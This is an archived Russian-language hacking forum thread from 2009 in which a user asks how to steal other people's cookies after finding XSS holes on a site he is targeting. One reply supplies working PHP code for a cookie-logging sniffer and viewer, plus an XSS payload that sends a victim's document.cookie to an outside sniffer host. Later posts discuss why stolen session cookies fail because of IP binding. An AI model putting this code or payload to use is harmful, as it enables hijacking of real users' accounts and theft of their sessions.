PDA

Просмотр полной версии : Куки

Badak
12.07.2009, 16:58
Все доброго времени суток.Ребята,подскажите как мне чужие куки забирать.Заранее спасибо
Badak
12.07.2009, 17:19
Я нашел XSS,что дальше?:Р
Inotsee
12.07.2009, 17:24
Издеваешься? Знаешь как найти XSS и не знаешь как запрос составить? Составь запрос, дай жертве ссылку и лови его куки на сниффере.
Badak
12.07.2009, 17:26
Я не издеваюсь))Я знаю как XSS найти уже на нужном сайте нашел 23,а как запрос составить и что дальше делать понятия не имею,но хочу научиться
br3k
12.07.2009, 17:30
XSS
_ttp://hackzona.ru/hz.php?name=News&file=article&sid=5005
_ttp://www.cgisecurity.com/articles/dx27.html
_ttp://ha.ckers.org/xss.html
_ttp://forum.antichat.ru/thread20140.html
_ttp://forum.antichat.ru/thread8038.html
_ttp://forum.antichat.ru/thread7124-XSS+FAQ.html
К изучению.
Aikaram
12.07.2009, 17:32
иди лучше книжки почитай, которые на лето задали. а то все куки да куки.
Badak
12.07.2009, 17:35
Тебе выдали ты иди и читай
Badak
12.07.2009, 18:40
Может мне кто-то ответить?!Что делать после того как нашел XSS?
Flegmatique
12.07.2009, 18:43
ссылки тебе дали, читай и действуй
жевать за тебя никто не будет
Failure
12.07.2009, 19:18
sniff.php

<?php
$ip=$_SERVER["REMOTE_ADDR"];
$ref=$_SERVER["HTTP_REFERER"];
$ua=$_SERVER["HTTP_USER_AGENT"];
$q=$_SERVER["QUERY_STRING"];
if($ref == "") {
$str = "<b>$ip</b> | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>================================================== ================================================== ==";
}
else {$str = "<b>$ip</b> | Пришел с : <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>================================================== ================================================== ==";}

$file=fopen("log.txt","a+");
fwrite($file,"$str<br>");
fclose($file);
?>
<img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg">

log.php:

<?php
echo "<html>
<body>
<meta http-equiv; charset=windows-1251>
<title>WEB Sniffer</title>
<body bgcolor=black style=color:red>
<h1>WEB SNIFFER</h1>
<input type=submit value='Обновить' onClick=javascript:window.location='log.php'>
</form>
<br><br><br>
================================================== ================================================== ==<br>";
if(file_exists("log.txt"))
require "log.txt";
echo "<br></body></html>";
?>


http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>
G4bR1eL
02.08.2009, 18:31
Почему некоторыми куками нельзя воспользоваться? Например форум - подставил куки жертвы, выкидывает в Гости...
HAXTA4OK
06.08.2009, 13:31
из за привязки к IP может быть
G4bR1eL
06.08.2009, 20:02
по ходу она и есть. А бага с базой никакого не может быть?)
HAXTA4OK
06.08.2009, 21:09
я так понял ты про IPB форум ведеш речь...нет нету